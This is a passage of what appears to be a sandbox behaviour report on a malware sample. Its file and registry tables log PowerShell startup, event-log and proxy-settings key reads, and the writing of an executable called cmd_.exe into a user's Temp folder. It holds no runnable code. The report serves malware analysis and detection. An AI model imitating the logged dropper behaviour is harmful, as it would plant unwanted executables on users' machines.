| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
5 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
2 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
6 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
6 | |
| Create | C:\Users\qj4SUKboE\AppData\Local\Temp\cmd_.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONIN$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Get Info | C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0 | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Users\qj4SUKboE | type = file_attributes |
|
1 | |
| Get Info | C:\ | type = file_attributes |
|
4 | |
| Get Info | C:\Users\qj4SUKboE\Desktop | type = file_attributes |
|
5 | |
| Get Info | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | type = file_type |
|
2 | |
| Get Info | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | type = size, size_out = 0 |
|
1 | |
| Get Info | C:\Users\qj4SUKboE\AppData\Local\Temp\cmd_.exe | type = file_type |
|
2 | |
| Get Info | C:\Users\qj4SUKboE\AppData\Local\Temp\cmd_.exe | type = file_attributes |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 4096 |
|
3 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 3315 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 781, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 4096 |
|
26 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 2530 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 542, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 0 |
|
3 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 4018 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 78, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 3022 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 50, size_out = 0 |
|
1 | |
| Read | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | size = 4096, size_out = 4096 |
|
5 | |
| Read | CONIN$ | size = 8192 |
|
1 | |
| Write | CONOUT$ | size = 79 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 79 |
|
1 | |
| Write | CONOUT$ | size = 30 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | C:\Users\qj4SUKboE\AppData\Local\Temp\cmd_.exe | size = 4096 |
|
2 | |
| Write | C:\Users\qj4SUKboE\AppData\Local\Temp\cmd_.exe | size = 8677 |
|
1 | |
| Write | C:\Users\qj4SUKboE\AppData\Local\Temp\cmd_.exe | size = 65536 |
|
1 | |
| Write | C:\Users\qj4SUKboE\AppData\Local\Temp\cmd_.exe | size = 21584 |
|
1 | |
| Write | C:\Users\qj4SUKboE\AppData\Local\Temp\cmd_.exe | size = 63888 |
|
1 | |
| Write | C:\Users\qj4SUKboE\AppData\Local\Temp\cmd_.exe | size = 5808 |
|
1 | |
| Write | C:\Users\qj4SUKboE\AppData\Local\Temp\cmd_.exe | size = 4491 |
|
1 | |
| Write | CONOUT$ | size = 31 |
|
1 |
Registry (211)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
9 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Environment | value_name = PSMODULEPATH, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
9 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
9 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | value_name = InstallationType, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | value_name = InstallationType, data = Client, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = Library, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = Library, data = netfxperf.dll, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = First Counter, data = 4986, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = Counter Names, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
